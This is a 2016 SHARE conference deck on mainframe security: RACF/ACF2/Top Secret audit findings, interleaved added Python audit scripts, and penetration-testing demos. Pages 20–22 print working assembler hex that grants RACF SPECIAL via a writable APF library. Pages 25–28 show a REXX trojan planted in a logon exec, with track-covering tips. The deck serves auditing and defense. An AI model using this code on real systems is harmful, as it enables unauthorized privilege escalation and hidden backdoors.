Page 1: 2016 share the three headed beast v4

www.share.org/sanantonio-eval

http://creativecommons.org/licenses/by-nc-nd/3.0/

Kerberos or Cerberus? The Three Headed Monster of Mainframe Security, Penetration Testing and Hacking

Brian Marshall, Mark Wilson & Chad Rikansrud

#19708

Page 2

Agenda

● The Top Five (or even Six) Assessment Findings (Brian Marshall: [email protected])
● How to exploit One or Two of them (Mark Wilson: [email protected])
● The Other World (Chad Rikansrud: [email protected])
● Questions

Page 3

Introduction – Brian Marshall

● 20 years in Information Technology
● VP Research and Development for Vanguard Integrity Professionals
● Mainframe RACF specialist
● DOD DISA STIG specialist
● Father and Grandfather.
● Speaker at many events (ISACA, ISSA, SHARE, Vanguard)
● Short, but devilishly good looking.

Page 4

TOP FIVE

Page 5

Finding: Started Task IDs are not Defined as PROTECTED in RACF, RESTRICT in ACF2, or in the STC Record in Top Secret.

Explanation: User IDs associated with started tasks should be defined as such, which exempts them from revocation due to inactivity or excessive invalid password attempts and prevents them from being used to sign on to an application.

Risk: The ESM will allow the user ID to be used for the started task even if it has become revoked, but some started tasks may either submit jobs to the internal reader that will fail, or may issue a RACROUTE REQUEST=VERIFY macro for the user ID that will also fail.

Recommended Best Practice and Remediation: Review all started task user IDs that are not protected. Determine if the user IDs are used for any other function that might require a password. Define the started task user IDs as “protected” for those tasks that do not require a password.

“Top Five” Assessment Finding #5

Page 6

Finding: Critical data sets with ‘global access’ greater than READ.

Explanation: The UACC value in RACF for a dataset profile defines the default level of access for any user whose user ID, or a group to which it is connected, does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2; everything must be explicitly allowed.

Risk: Data sets that are protected by a ‘global access’ greater than READ will allow most users with system access to modify critical data residing in these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.

Recommended Best Practice and Remediation: Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with greater than READ access.

“Top Five” Assessment Finding #4

Page 7

Finding: Sensitive Data Sets with ‘global access’ Greater than NONE.

Explanation: The UACC value in RACF for a dataset profile defines the default level of access for any user whose user ID, or a group to which it is connected, does not appear in the access list. The ALL record in Top Secret contains data sets that have a default level of access for all users. There is no equivalent in CA ACF2; everything must be explicitly allowed.

Risk: Data sets that are protected by ‘global access’ greater than NONE allow most users with system access to read or modify these data sets. In addition, users may be able to delete any data set covered by the dataset profiles that have global access defined.

Recommended Best Practice and Remediation: Review each of these profiles and determine whether the ‘global access’ is appropriate. For those profiles where access is excessive, you will have to determine who really needs access before changing the ‘global access’. To find out who is accessing these data sets, review SMF data to determine who is accessing the data sets with the ‘global access’.

“Top Five” Assessment Finding #3

Page 8

Finding: Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0.

Explanation: User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX directories and files and full authority to administer z/OS UNIX.

Risk: Since the UNIX environment is the z/OS portal for critical applications such as file transfers, Web applications, and TCPIP connectivity to the network in general, the ability of these superusers to accidentally or maliciously affect these operations is a serious threat. No personal user IDs should be defined with an OMVS segment specifying UID(0).

Remediation: The assignment of UID(0) authority should be minimized by managing superuser privileges by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or access to one or more profiles in the UNIXPRIV class.

“Top Five” Assessment Finding #2

Page 9

Finding: Excessive Number of User IDs with No Password Interval.

Explanation: User IDs with no password interval are not required to change their passwords.

Risk: Since passwords do not need to be changed periodically, people who knew a password for an ID could still access that ID even if they are no longer authorized users.

Remediation: Review each of the personal user profiles to determine why they require no expiration. Their passwords should adhere to the company policy regarding password changes. If the user ID is being used for started tasks or surrogate, it should be reviewed and changed to the appropriate ESM privilege.

“Top Five” Assessment Finding #1
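One way to check for findings #5, #2 and #1 from a single user export, added here as an example that is not part of the presentation or of any vendor tool: the script parses a constructed, LISTUSER-style sample (real LISTUSER output has more fields and its spacing may differ; the parser keys only on the USER=, ATTRIBUTES=, PASS-INTERVAL= and UID= tokens) together with a constructed set of started-task user IDs (what RLIST STARTED * STDATA shows as USER= on a live system). All user IDs, names and the STARTED_TASK_USERS set are assumptions.

```python
"""Audit a LISTUSER-style export for assessment findings #5, #2 and #1.

Added example. The sample below is a constructed, LISTUSER-style rendering
(real LISTUSER output has more fields and different spacing); the checks key
only on the USER=, ATTRIBUTES=, PASS-INTERVAL= and UID= tokens.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample: two started-task IDs and two personal IDs.
SAMPLE_LISTUSER = """\
USER=STCOMVS  NAME=OMVS KERNEL STC       OWNER=SYS1    CREATED=12.045
 DEFAULT-GROUP=STCGRP  PASSDATE=N/A    PASS-INTERVAL=N/A  PHRASEDATE=N/A
 ATTRIBUTES=PROTECTED
 OMVS INFORMATION
 ----------------
 UID= 0000000000
 HOME= /
USER=STCFTP   NAME=FTP SERVER STC        OWNER=SYS1    CREATED=12.045
 DEFAULT-GROUP=STCGRP  PASSDATE=15.101 PASS-INTERVAL= 30  PHRASEDATE=N/A
 ATTRIBUTES=NONE
USER=SYSPRG1  NAME=SYSTEMS PROGRAMMER    OWNER=SECADM  CREATED=14.200
 DEFAULT-GROUP=SYSPROG PASSDATE=15.300 PASS-INTERVAL=N/A  PHRASEDATE=N/A
 ATTRIBUTES=SPECIAL OPERATIONS
 OMVS INFORMATION
 ----------------
 UID= 0000000000
 HOME= /u/sysprg1
USER=SECADM1  NAME=SECURITY ADMIN        OWNER=SECADM  CREATED=14.200
 DEFAULT-GROUP=SECADM  PASSDATE=15.300 PASS-INTERVAL= 30  PHRASEDATE=N/A
 ATTRIBUTES=SPECIAL
 OMVS INFORMATION
 ----------------
 UID= 0000001234
 HOME= /u/secadm1
"""

# Constructed: the user IDs assigned to started tasks (what RLIST STARTED *
# STDATA shows as USER= on a live system).
STARTED_TASK_USERS = {"STCOMVS", "STCFTP"}


@dataclass
class UserRecord:
    userid: str
    attributes: frozenset        # e.g. {"SPECIAL", "PROTECTED"}
    pass_interval: str           # "N/A" means no password interval
    uid: int | None              # z/OS UNIX UID, None without an OMVS segment


def parse_listuser(text: str) -> dict:
    """Split the export into one UserRecord per USER= block."""
    users = {}
    for block in re.split(r"(?m)^(?=USER=)", text):
        head = re.match(r"USER=(\S+)", block)
        if not head:
            continue
        attrs = re.search(r"ATTRIBUTES=(.*)", block)
        interval = re.search(r"PASS-INTERVAL=\s*(\S+)", block)
        uid = re.search(r"(?m)^\s*UID=\s*(\d+)", block)
        users[head.group(1)] = UserRecord(
            userid=head.group(1),
            attributes=frozenset(attrs.group(1).split()) if attrs else frozenset(),
            pass_interval=interval.group(1) if interval else "N/A",
            uid=int(uid.group(1)) if uid else None,
        )
    return users


def audit_users(users: dict, started_task_users: set) -> list:
    """Return (finding number, user ID, message) tuples for each violation."""
    findings = []
    for rec in users.values():
        is_stc = rec.userid in started_task_users
        protected = "PROTECTED" in rec.attributes
        # Finding #5: a started-task ID must be PROTECTED.
        if is_stc and not protected:
            findings.append((5, rec.userid, "started task ID not PROTECTED"))
        # Finding #1: a password-bearing ID whose password never expires.
        if not protected and rec.pass_interval == "N/A":
            findings.append((1, rec.userid, "no password interval"))
        # Finding #2: UID(0) on a personal ID (started tasks are exempt).
        if rec.uid == 0 and not is_stc:
            findings.append((2, rec.userid, "personal ID has OMVS UID(0)"))
    return findings


if __name__ == "__main__":
    for num, userid, msg in audit_users(parse_listuser(SAMPLE_LISTUSER), STARTED_TASK_USERS):
        print(f"Finding #{num}: {userid}: {msg}")
```

Started-task IDs that legitimately carry UID(0), such as the OMVS kernel task in the sample, are not reported under #2; only personal IDs are, which matches the wording of the finding. A started-task ID that is not PROTECTED is reported under #5 and, if its password also never expires, under #1 as well, since both remediations apply to it.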

Page 10

Finding: Excessive Access to APF Libraries.

Explanation: Authorized Program Facility (APF) libraries are an integral part of the z/OS architecture to enable maintenance of the integrity of the z/OS operating system environment. Libraries designated as APF allow programs to execute with the authority of z/OS itself, so the ability to modify these libraries must be strictly controlled.

Risk: UPDATE or higher access to an APF library can allow an individual to create an authorized program which can bypass security controls and execute privileged instructions. UPDATE or higher access should be limited to senior systems support staff.

Remediation: Review the protection of all APF libraries and remove or change inappropriate access list entries, and ensure that all UPDATE activity is logged to SMF.

©2015 Vanguard Integrity Professionals, Inc. All Rights Reserved. You have a limited license to view these materials for your organization’s internal purposes.

Any unauthorized reproduction, distribution, exhibition or use of these copyrighted materials is expressly prohibited.

“The Worst” Assessment Finding
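The data set findings (#4, #3 and this APF finding) can be checked together from an access-rights export. The script below is an added example, not from the presentation or from Vanguard: its records are constructed and space-separated, modelled loosely on the IRRDBU00 unload's data-set basic (0400) and data-set access (0404) record types (the real unload is fixed-column, so the parser would need adapting), and the CRITICAL, SENSITIVE, APF and APF_UPDATERS sets are assumptions standing in for the site's own classification and APF list.

```python
"""Audit data-set profiles for findings #4 and #3 and for APF library access.

Added example. Records are constructed and space-separated, modelled loosely
on the IRRDBU00 unload's data-set basic (0400) and data-set access (0404)
record types; the real unload is fixed-column, so the parser must be adapted.
"""
from __future__ import annotations
from dataclasses import dataclass, field

# RACF access levels in ascending order of privilege.
ACCESS_RANK = {"NONE": 0, "EXECUTE": 1, "READ": 2, "UPDATE": 3, "CONTROL": 4, "ALTER": 5}

# Constructed sample. 0400: type, profile, UACC, lowest success level audited.
# 0404: type, profile, authorising ID or group, access granted.
SAMPLE_RECORDS = """\
0400 SYS1.LINKLIB       READ   AUDIT_OK=UPDATE
0404 SYS1.LINKLIB       SYSPROG ALTER
0404 SYS1.LINKLIB       APPDEV  UPDATE
0400 SYS1.PARMLIB       UPDATE AUDIT_OK=ALTER
0404 SYS1.PARMLIB       SYSPROG ALTER
0400 SYS1.RACF          NONE   AUDIT_OK=READ
0404 SYS1.RACF          SECADM  ALTER
0400 PROD.PAYROLL.DATA  READ   AUDIT_OK=NONE
0404 PROD.PAYROLL.DATA  PAYROLL UPDATE
0400 SYS1.APF.LOAD      UPDATE AUDIT_OK=NONE
0404 SYS1.APF.LOAD      SYSPROG ALTER
"""

# Constructed classifications. On a live system the APF set comes from the
# APF list (ISRDDN APF, IPLINFO) and the other two from the site's data
# classification; the names here are assumptions.
CRITICAL = {"SYS1.LINKLIB", "SYS1.PARMLIB"}
SENSITIVE = {"SYS1.RACF", "PROD.PAYROLL.DATA"}
APF = {"SYS1.LINKLIB", "SYS1.APF.LOAD"}
APF_UPDATERS = {"SYSPROG"}   # the only IDs/groups allowed UPDATE or higher on APF


@dataclass
class DatasetProfile:
    name: str
    uacc: str = "NONE"
    audit_ok: str = "NONE"                          # success auditing level
    access_list: dict = field(default_factory=dict)  # authorising ID -> access


def parse_records(text: str) -> dict:
    """Build one DatasetProfile per profile name from 0400 and 0404 records."""
    profiles = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        rtype, name = parts[0], parts[1]
        prof = profiles.setdefault(name, DatasetProfile(name))
        if rtype == "0400":
            prof.uacc = parts[2]
            prof.audit_ok = parts[3].split("=", 1)[1]
        elif rtype == "0404":
            prof.access_list[parts[2]] = parts[3]
    return profiles


def exceeds(level: str, limit: str) -> bool:
    """True when access level `level` grants more than `limit`."""
    return ACCESS_RANK[level] > ACCESS_RANK[limit]


def audit_datasets(profiles, critical, sensitive, apf, apf_updaters):
    """Return (finding, profile, message) tuples for every violation found."""
    findings = []
    for prof in profiles.values():
        # Finding #4: 'global access' above READ on a critical data set.
        if prof.name in critical and exceeds(prof.uacc, "READ"):
            findings.append(("#4", prof.name, f"critical data set has UACC {prof.uacc}"))
        # Finding #3: any 'global access' at all on a sensitive data set.
        if prof.name in sensitive and exceeds(prof.uacc, "NONE"):
            findings.append(("#3", prof.name, f"sensitive data set has UACC {prof.uacc}"))
        if prof.name in apf:
            # "The Worst" finding: UPDATE or higher outside the sysprog group,
            # whether granted through UACC or through an access list entry.
            if exceeds(prof.uacc, "READ"):
                findings.append(("APF", prof.name, f"UACC {prof.uacc} on APF library"))
            for who, access in sorted(prof.access_list.items()):
                if exceeds(access, "READ") and who not in apf_updaters:
                    findings.append(("APF", prof.name, f"{who} has {access}"))
            # UPDATE activity must reach SMF: success auditing at NONE, or only
            # at a level above UPDATE, would not record it.
            if prof.audit_ok == "NONE" or exceeds(prof.audit_ok, "UPDATE"):
                findings.append(("APF", prof.name, "UPDATE successes not logged to SMF"))
    return findings


if __name__ == "__main__":
    for finding, name, msg in audit_datasets(parse_records(SAMPLE_RECORDS),
                                             CRITICAL, SENSITIVE, APF, APF_UPDATERS):
        print(f"{finding:>4} {name:<20} {msg}")
```

The access-list check is deliberately stricter than the UACC check: an APF library with UACC READ is still reported when a group outside APF_UPDATERS holds UPDATE, which is the situation the slide describes (hundreds of users with update access at a site with ten or fewer systems programmers). The audit check implements the remediation's last clause; it does not replace reviewing the SMF records themselves.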

Page 11

Top Ten Critical Assessment Findings in Mainframe Environments

74%  Excessive Number of User IDs with no Password Interval               SEVERE
60%  Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0        SEVERE
54%  Sensitive Data Sets with ‘global access’ Greater than NONE           SEVERE
54%  Critical Data Sets with ‘global access’ Greater than READ            HIGH
53%  Started Task IDs are not Defined as ‘protected’ IDs                  HIGH
52%  Improper Use or Lack of UNIXPRIV Profiles                            HIGH
44%  Excessive Access to the SMF Data Sets                                HIGH
42%  Excessive Access to APF Libraries                                    SEVERE
42%  Excessive Access to z/OS UNIX File System Data Sets                  HIGH
40%  ESM Database(s) is not Adequately Protected                          SEVERE

10/14/15

Page 12

Time to handover to …...

Page 13

Introduction – Mark Wilson

● Technical Director at RSM Partners
● Been in IT for over 36 Years….
● I lead the Technical team at RSM that amounts to just over 60 technicians….yes it’s a lot of fun!!...most of the time
● IT Security, in particular mainframes, is my specialist subject

Page 14

Getting the language right

● Penetration Testing
  – Done by the good people out there to stop the bad folks getting in
  – This is the bit I enjoy the most
● Hacking
  – The bad guys or gals…… it’s not necessarily a male dominated activity these days
  – They are after our stuff….

Page 15

Getting the language right

● Vulnerability Scanning
  – Scanning the code delivered by IBM and ISVs along with any code you may have developed yourself
  – Test the code to see if it has any vulnerabilities that could be exploited by a knowledgeable user

Page 16

Getting the language right

● Auditing
  – The process of checking that we are doing everything correctly
  – These are the good guys and are here to help
  – Work with them not against them
  – Educate them, don’t shun them…we all had to start somewhere
  – How many IT Auditors actually understand what we do?

Page 17

Poorly protected APF lib’s

● Very simple exploit
● It’s not uncommon to find hundreds of users having update access to APF authorised libraries……
● What's most alarming is that the client site(s) typically has 10 or fewer system programmers
● Having update authority to an APF authorised library means I can write my own authorised code and run it undetected

Page 18

Poorly protected APF lib’s

● Many ways to find the list of APF Authorised libraries
  – ISRDDN, IPLINFO REXX Exec, TASID, etc.
  – Or write your own
● TSO ISRDDN
  – APF
  – ONLY APF
  – MEM FRED
● TSO IPLINFO APF – If you have installed IPLINFO REXX

Page 19

Excessive Access to APF Libraries

● Once you have found an APF library you can update…
● Then the following manual sometimes can help

Page 20

Just a Bit of Code… Honest

A        START
         DC    X'411000300A6B58F0021CBFFFF154A774000858F0022458FF006C58FF00C896'
         DC    X'80F02617FF07FE'
         END   A

Page 21

Now the good bit!

● Assemble and linkedit the code shown with AC(1)
● Place in an APF library with any name you want (LURACF)
● Run the program as a two step batch job…
  – The first to call this program (PGM=LURACF)
  – The second to issue any RACF command you want!

Page 22

Now the good bit!

● Why/How does this work?
● Well, that little bit of code flipped a flag in my ACEE to turn on the RACF SPECIAL flag for my in-storage ACEE
● This can be modified so that it looks very innocent, e.g. part of a translate table, or it can be rewritten in a virus-type manner, making it more difficult to disassemble

Page 23

Let’s do it!

Page 24

CLIST/REXX Issues

● We quite often see CLIST/REXX Libraries that are universally updateable that are not at the bottom of the list of concatenated datasets for SYSPROC or SYSEXEC
● Simply find an exec that is lower down in the concatenation that is used by one of the privileged users (Sec Admin, Sysprog, etc.)
● Copy an exec to the universally accessible dataset and add a bit of your own code
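A defender's check for the concatenation problem described above, added here as an example that is not from the presentation: given the SYSPROC/SYSEXEC search order as ISRDDN would list it, the UACC of each library and the member names each library holds (all three constructed for the example; USER.CLIST, WBA001 and MYCMD are the names the slides use, the rest are assumptions), it reports any universally updatable library that is searched before more restrictive ones, and any member of such a library that shadows a copy further down the concatenation.

```python
"""Check SYSPROC/SYSEXEC concatenations for universally updatable libraries.

Added example, not from the presentation. Inputs are constructed: the
concatenation order as ISRDDN would list it, the UACC of each library, and
the member names each library holds.
"""
ACCESS_RANK = {"NONE": 0, "EXECUTE": 1, "READ": 2, "UPDATE": 3, "CONTROL": 4, "ALTER": 5}

# Constructed: DD name -> data sets in search order (first match wins).
CONCATENATION = {
    "SYSPROC": ["USER.CLIST", "SYS1.SYSPROC", "ISP.SISPCLIB"],
    "SYSEXEC": ["SYS1.SYSEXEC", "USER.EXEC"],
}
# Constructed: UACC of each library's data set profile.
UACC = {
    "USER.CLIST": "UPDATE", "SYS1.SYSPROC": "READ", "ISP.SISPCLIB": "READ",
    "SYS1.SYSEXEC": "READ", "USER.EXEC": "UPDATE",
}
# Constructed member directories (WBA001 and MYCMD are the names used on the slides).
MEMBERS = {
    "USER.CLIST": {"WBA001", "MYCMD"},
    "SYS1.SYSPROC": {"WBA001", "LOGON1"},
    "ISP.SISPCLIB": {"SITEMSG"},
    "SYS1.SYSEXEC": {"IPLINFO"},
    "USER.EXEC": {"MYTOOL"},
}


def universally_updatable(dsn, uacc):
    """True when the profile's UACC lets any user write to the library."""
    return ACCESS_RANK[uacc.get(dsn, "NONE")] >= ACCESS_RANK["UPDATE"]


def audit_concatenation(concat, uacc, members):
    """Return (severity, DD, data set, message) for each exposure found."""
    findings = []
    for dd, libs in concat.items():
        for pos, dsn in enumerate(libs):
            if not universally_updatable(dsn, uacc):
                continue
            later = libs[pos + 1:]
            if later:
                # Writable library searched before more restrictive ones: a
                # member copied in here overrides the copy further down.
                findings.append(("HIGH", dd, dsn,
                                 f"UACC {uacc[dsn]} and {len(later)} libraries follow it"))
            else:
                findings.append(("MEDIUM", dd, dsn,
                                 f"UACC {uacc[dsn]} (last in concatenation)"))
            # Members already present in both places are the live exposure.
            for other in later:
                for member in sorted(members.get(dsn, set()) & members.get(other, set())):
                    findings.append(("HIGH", dd, dsn,
                                     f"member {member} shadows the copy in {other}"))
    return findings


if __name__ == "__main__":
    for sev, dd, dsn, msg in audit_concatenation(CONCATENATION, UACC, MEMBERS):
        print(f"{sev:<6} {dd:<7} {dsn:<14} {msg}")
```

The shadow report is the part worth acting on first: a member that exists both in a writable library and in a protected one lower down is exactly the situation the next slides walk through. A writable library that is last in the concatenation is reported at a lower severity, but it remains an exposure for any privileged user whose logon procedure runs execs from it, so the remediation is to remove the UACC of UPDATE rather than to rely on ordering alone.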

Page 25

CLIST/REXX Issues

● An Example
● When doing a Pen test we determined that we had UPDATE authority to a CLIST/REXX Library allocated and used each time we logged on to TSO…the dataset was called USER.CLIST
● Add to this the fact that
  – All users via their Logon Proc call the same exec WBA001
● A simple update to WBA001 to call a little piece of code….
● And then just sit and wait….

Page 26

CLIST/REXX Issues

Added this line here

Page 27

CLIST/REXX Issues

The contents of USER.CLIST(MYCMD):

/* REXX */
/***************************************************/
/* Trap the responses so no messages issued to the */
/* user as they logon….                            */
/***************************************************/
TEMP = OUTTRAP(LINE.)
/* is this the user I want to exploit?? */
UID = sysvar(sysuid)
/* If so get THEM to issue the command you want */
IF UID = CHAD or BRIAN then do
  address tso alu MY_HACKER_ID SPECIAL OPERATIONS
End

Could use a prefix (SUBSTR) for a group of users!

Page 28

CLIST/REXX Issues

● So why pick on CHAD or BRIAN?
  – We determined from looking at the syslog and output on the Q that CHAD and BRIAN were RACF SYSTEM SPECIAL
● So the next time either of them logs onto the system any command entered into MYCMD is run…game over….
● I can even cover my tracks by resetting the ISPF stats to show another userid having last changed WBA001 and MYCMD
● Imagine if I changed it to CHAD or BRIAN!!

Page 29

Time to handover to …...

Page 30

Introduction – Chad Rikansrud

• 20 Years in Information Technology
• Networking Protocols / Forensics
• Programming (Assembler, C, Python, others)
• Security & Security Research (z/OS, x86_64)
  – Contributor to open source projects: Metasploit, r2 disassembly framework, scrypt
• Cryptography implementations / protocols
• Capture the Flag builder (BSides DFW, MSP)
• Speaker at DEF CON, Derbycon, MN SEC, Others

Page 31

How the bad guys think

● Let’s assume 3 types of attackers:
  – No mainframe knowledge, but skilled at exploits / other OS’s
  – Some mainframe knowledge, also skilled at other OS’s
  – Mainframe knowledge + hacking skills
● Look at 3 possible attacks (based on the above)
  – JAVA deserialization / poor configuration (works out of the box)
  – Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL
  – SMP/E injection & Forgery

Page 32

Attack #1 - JAVA

Java
• Gift that keeps giving
• Combination of inherent vulnerabilities (fixed with patching, SMP/E, etc.) and poorly written code.
• Deserialization attacks (Common Libraries / Bad code)
• Java takes care of the Code Page issues (Good for you/Good for them!)

Java Exploit Demo

Page 33

Page 34

Attack #2 – JCL over FTP w/Stolen Creds

JCL over FTP
• Fantastic way to remotely exploit a system with given creds.
• How to get creds (Sniff wire, MITM Self-Signed Cert).
• How to submit reliable JCL over FTP (Metasploit)
• What to submit? (Shells, pull password database, etc.)

JCL over FTP demo

Page 35

Page 36

Attack #3 – SMP/E Forgery

SMP/E
• Lots of controls around RACF authorization for SMP/E commands
• What about the Files / Libraries?
  • OMVS /smpnts directory?
  • z/OS SMPPTS libraries
  • Global / Target / Distribution zones
• Insert code to build Load Module / Replace an Exit / Backdoor?

SMP/E Forgery Demo

Page 37

Page 38

Summary - Attacks

● Don’t presume that attacks built for ‘nix / Windows can’t be repurposed
  – Sometimes they work out of the box
  – Occasionally require a little retooling / build tools to make easier
  – Some work in theory – but require in depth knowledge.
  – All can make your life miserable

Page 39

Summary - Attacks

● Remediation
  – Secure your SMP/E libraries (See Brian’s notes on insecure libraries)
  – Lock down FTP configuration.
  – Strong Passwords + 2-factor authentication <----- This mitigates many issues.
  – Secure coding training / practice. (Esp. Java)

Page 40

Questions

Page 41

Related Sessions

Session # | Session Title | Date and Time | Room | Speaker(s)
19683 | RACF Monitoring & Reporting | 2016-08-02, 12:30:00 | L402 | Robert S. Hansel
19639 | RACF Update | 2016-08-03, 08:30:00 | L401 | Mark Nelson, Julie A. Bergh
19638 | CA ACF2 & CA Top Secret Update - R16 is Finally Here! | 2016-08-03, 10:00:00 | L401 | Carla Flores
19612 | HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and Routing to Linux on z | 2016-08-03, 11:15:00 | A601 | Linda Harrison
19646 | RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect Combination! | 2016-08-03, 13:45:00 | L402 | Mark Nelson, Julie A. Bergh
19782 | Experiences with Two Factor Authentication (2FA) on z/OS | 2016-08-03, 15:15:00 | A704 | Gary Morgan, Steve Brinkley
19464 | Encryption? Yeah, We Do That | 2016-08-04, 10:00:00 | L505 | Phil Smith III
19389 | Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure? | 2016-08-04, 10:00:00 | A602 | Leigh Compton
19655 | Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key Archival Using ICSF (Integrated Cryptographic Service Facility) | 2016-08-04, 13:45:00 | A601 | Eysha Shirrine Powers
19241 | z/OS Communications Server Security Using Policy Agent | 2016-08-04, 13:45:00 | L401 | Linda Harrison
19804 | PAGENT & RACF: Security from within the Black Box and Beyond | 2016-08-04, 16:30:00 | L508 | Brian Marshall, Marlaina Chirdon
19239 | Safe and Secure Transfers with z/OS FTP | 2016-08-04, 16:30:00 | L402 | Chris Meyer, Sam Reynolds
19424 | A New Look at Mainframe Hacking and Penetration Testing | 2016-08-05, 08:30:00 | L402 | Mark Wilson
19765 | SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as Airplanes | 2016-08-05, 11:15:00 | A702 | Mark Nelson

Page 42

Thank You for Attending!

Please remember to complete your evaluation in the SHARE mobile app.

#19708